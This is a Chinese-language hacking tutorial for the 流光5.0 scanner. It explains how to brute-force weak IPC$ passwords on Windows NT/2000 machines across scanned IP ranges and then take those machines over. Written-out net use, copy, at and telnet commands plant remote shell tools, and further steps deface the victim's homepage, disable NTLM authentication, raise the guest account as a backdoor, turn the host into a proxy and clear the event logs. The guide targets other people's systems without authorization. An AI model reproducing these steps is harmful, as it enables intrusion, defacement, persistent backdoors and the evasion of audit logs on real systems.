概述
流光5.0的破解可分為5大部分:
一、POP3/FTP/…探測
二、IPC探測
三、SQL探測
四、高級掃描
因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光5.0的高級套用了:)
流光5.0的IPC探測:
目的和任務
1、用流光5.0的IPC探測獲得一台NT主機的管理許可權,並將這台主機做成一個跳板/代理。
2、學習IPC探測的相關知識。
探測流程
1、你得有流光5.0,我這裡試驗用的是流光5.02001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連線功能是NT/ 2000提供的功能。而且流光5.0FOR 2K 要求你的作業系統得是NT/2000,否則流光5.0啟動會失敗!
什麼是IPC:
IPC是指"InterProcess Communications",準確的說是ipc$,是默認的在系統啟動時的admin共享。
IPC$是Windows NT/2K中特有的遠程網路登入功能,它的特點是在同一時間內,兩個IP之間只允許建立一個連線。
注意,你試圖通過IPC$連線會在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
2、首次啟動流光5.0,會看到註冊的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的許可權。這裡我們要作的是得到一台跳板,那么就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。
3、出先了上面的小視窗,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機
4、探測中……
(注意如果你要探測的是流光5.0保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現"IP保留"的字樣)
有遠程主機的管理密碼了,我們剩下的就是想辦法控制它了,有什麼好辦么? )有的是 !自己看看工具-選單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
黑了他 !
開個dos prompt 執行如下命令,本次用的例子如下圖。
1、 net use \\對方ip\ipc$ "密碼" /user:"用戶名" || 建立遠程連線
2、 copy icmd.exe \\對方ip\admin$ || admin$是對方的winnt目錄 ) 這裡檔案多。
3、 net time \\對方IP || 看看對方的本地時間
4、at \\對方ip 啟動程式的時間 啟動程式名 啟動程式的參數 || 用at命令來定時啟動程式,在這裡我們用soon這個程式來做也可以,它可以取代 3/4兩步。
5、 telnet 對方ip 連線埠 ||
6、輸入pass (如果不是用icmd.exe,或者沒有設定口令就不用了) ||
7、在開個視窗,繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,只需要把我們的首頁檔案覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:\interpub\wwwroot\ .
假如首頁檔案是default.htm並且在c:\interpub\wwwroot,這樣:copy default.htm \\ip\c$\interpub\wwwroot
下面的圖有演示
8、其實黑人家是很低級並且沒意思的:(我們最好是物有所有,作成跳板吧,今後幹活方便點:
執行我們copy 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的許可權,或者其它的後門工具,這類東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的么 ?
當然了,只要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人家的server上,速度快、空間無限,嘿嘿 :)
10、日誌清除,下線 :
執行我們copy 過去的cl.exe clear.exe 都可以清除日誌,比如clear all :清除所有的日誌。然後在下線:net use \\ip\ipc$ /delete
流光5.0簡介
流光5.04.7)一個絕好的ftp、pop3解密工具,界面豪華,功能強大!功能簡介如下:
1、用於檢測POP3/FTP主機中用戶密碼安全漏洞。
2、163/169雙通。
3、多執行緒檢測,消除系統中密碼漏洞。
4、高效的用戶流模式。
5、高效伺服器流模式,可同時對多台POP3/FTP主機進行檢測。
6、最多500個執行緒探測。
7、執行緒逾時設定,阻塞執行緒具有自殺功能,不會影響其他執行緒。
8、支持10個字典同時檢測。
9、檢測設定可作為項目保存。
10、取消了國內IP限制而且免費。
流光5.04.7新增功能:
1、加入了本地模式,在本機運行是不必安裝Sensor。
2、Sensor掃描臨時結果檔案(*.PTR)的尺寸大約減少了10倍。
3、後台掃描模式時,掃描的結果(*.PTR)可以直接通過附屬檔案傳送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光5.0的界面和Sensor之間的通訊採用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務,新的控制服務在升級Sensor時不再會失敗。
8、Sensor的服務名稱可以任意指定,控制服務和Sensor的進程名稱也可以任意指定。
9、支持XP(本地模式),很快會有98/ME的版本。